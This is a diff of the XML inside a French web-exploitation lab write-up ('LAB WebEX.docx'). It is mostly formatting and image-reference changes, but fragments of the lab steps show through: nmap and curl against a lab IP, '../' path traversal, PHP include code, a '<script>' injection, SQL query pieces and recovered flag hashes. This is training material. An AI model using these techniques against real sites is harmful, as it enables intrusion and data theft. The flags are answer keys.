+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId51"/>
+      <w:footerReference w:type="default" r:id="rId55"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -8529,7 +9009,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00EF684D"/>
+    <w:rsid w:val="00822324"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Titre1">
     <w:name w:val="heading 1"/>
@@ -8732,6 +9212,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">

--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -754,6 +754,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -763,6 +764,7 @@
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -864,153 +866,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -I </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-            <w:highlight w:val="black"/>
-          </w:rPr>
-          <w:t>http://192.168.10.22</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2C6D97" wp14:editId="08D48480">
-            <wp:extent cx="3763926" cy="1384994"/>
-            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
-            <wp:docPr id="1554965561" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1554965561" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3780348" cy="1391037"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF8B745" wp14:editId="762B0987">
-            <wp:extent cx="4167963" cy="332359"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
-            <wp:docPr id="1634424641" name="Image 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1634424641" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4204697" cy="335288"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
@@ -1051,6 +906,7 @@
           <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1058,7 +914,17 @@
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff</w:t>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1069,11 +935,19 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>robots_and_hidden_files</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>robots</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>_and_hidden_files</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1110,7 +984,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1163,7 +1037,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1223,7 +1097,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve"> on récupère ce hash : </w:t>
+        <w:t xml:space="preserve"> on récupère </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>ce</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hash : </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1261,7 +1149,7 @@
         </w:rPr>
         <w:t xml:space="preserve">sur </w:t>
       </w:r>
-      <w:hyperlink r:id="rId16" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -1290,7 +1178,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46ED1299" wp14:editId="1E3849E0">
             <wp:extent cx="5760720" cy="476250"/>
@@ -1307,7 +1194,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1343,7 +1230,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Aller sur </w:t>
       </w:r>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -1425,6 +1312,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F383A9E" wp14:editId="66EE9BD4">
             <wp:extent cx="4926757" cy="3533775"/>
@@ -1441,7 +1329,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1494,7 +1382,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -1532,7 +1420,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1567,8 +1455,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Les séquences ../ permettent de remonter des répertoires. </w:t>
+        <w:t>Les séquences</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/ permettent de remonter des répertoires. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1643,7 +1544,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId19" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -1664,6 +1565,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFBC989" wp14:editId="21EEDA69">
             <wp:extent cx="5337545" cy="1880967"/>
@@ -1680,7 +1582,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1988,13 +1890,23 @@
           <w:highlight w:val="black"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>if (</w:t>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2054,6 +1966,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2063,6 +1976,7 @@
         <w:t>include</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2150,6 +2064,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2159,6 +2074,7 @@
         <w:t>include</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2379,7 +2295,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2400,7 +2316,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Hack (trouvé dans la base de données)</w:t>
       </w:r>
       <w:r>
@@ -2409,7 +2324,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> =&gt; </w:t>
       </w:r>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2442,7 +2357,25 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&lt;script&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2475,6 +2408,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788A666A" wp14:editId="0A24FFA5">
             <wp:extent cx="3306726" cy="2579188"/>
@@ -2491,7 +2425,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2541,7 +2475,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2776,7 +2710,7 @@
       <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
       </w:pPr>
-      <w:hyperlink r:id="rId28" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2815,7 +2749,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2864,7 +2798,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3129,6 +3063,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3138,6 +3073,7 @@
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3299,6 +3235,7 @@
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3306,18 +3243,28 @@
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:t>f</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
+        <w:t>2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -3341,7 +3288,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3410,7 +3357,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3460,7 +3407,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3580,7 +3527,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3608,7 +3555,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3645,7 +3592,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3729,7 +3676,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3759,6 +3706,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3768,6 +3716,7 @@
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3822,7 +3771,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3935,7 +3884,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId39" w:history="1">
+      <w:hyperlink r:id="rId36" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3973,7 +3922,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4069,7 +4018,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4174,7 +4123,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4306,7 +4255,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4384,7 +4333,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4474,7 +4423,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4548,7 +4497,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId45"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4844,7 +4793,25 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">, email FROM </w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5166,7 +5133,7 @@
         </w:rPr>
         <w:t xml:space="preserve">» on arrive sur la page </w:t>
       </w:r>
-      <w:hyperlink r:id="rId46" w:history="1">
+      <w:hyperlink r:id="rId43" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -5208,7 +5175,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId47"/>
+                    <a:blip r:embed="rId44"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5242,7 +5209,21 @@
         <w:rPr>
